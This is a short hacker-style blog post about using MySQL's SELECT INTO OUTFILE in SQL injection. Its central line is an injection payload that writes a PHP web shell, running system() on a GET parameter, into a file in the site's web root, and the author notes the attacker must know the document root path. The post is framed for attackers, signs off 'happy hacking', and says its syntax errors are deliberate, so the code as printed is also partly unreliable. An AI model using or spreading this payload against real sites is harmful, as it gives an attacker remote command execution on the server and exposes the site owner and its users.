(real life) next steps in sql injection
We all know SQL Injection and a bunch of techniques to exploit this... I've decided to blog about a "new" one. Please don't consider this as "advanced sql injection" because its not 
MySQL is a great database management system and it allows you to do many things with the "select" statement, wouldn't it be TOO many things?
I guess everyone knows the basic "' or 1=1 /*" an its variants... but accessing restricted areas, changing user infos and dropping tables aren't the only cool stuff you can do with sql injections.
There is a feature that allows you to save your select into a file. It's called SELECT INTO FILE (duh!) and things can get pretty dangerous if you use it with a sql injection.
Isn't it clear enough yet? Ok, let me try to help you get the big picture.
what if someone inserts this code:
-
' union select ''<?php ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'',0,0,0,'*/ ?>' into outfile ' /home/mysite/lol.php' from users #
please notice that you'll need to know the documentroot path but this shouldn't be a problem with vulnerable php systems.
Well, I'm not intended to give you a cookbook and promote n00bism. So, if you still didn't figure out how to take advantage of this, you probably shouldn't use it. Google might help you as well 
happy hacking.
PS: syntax errors were generated on purpose.
No comments yet. Be the first.
Leave a reply
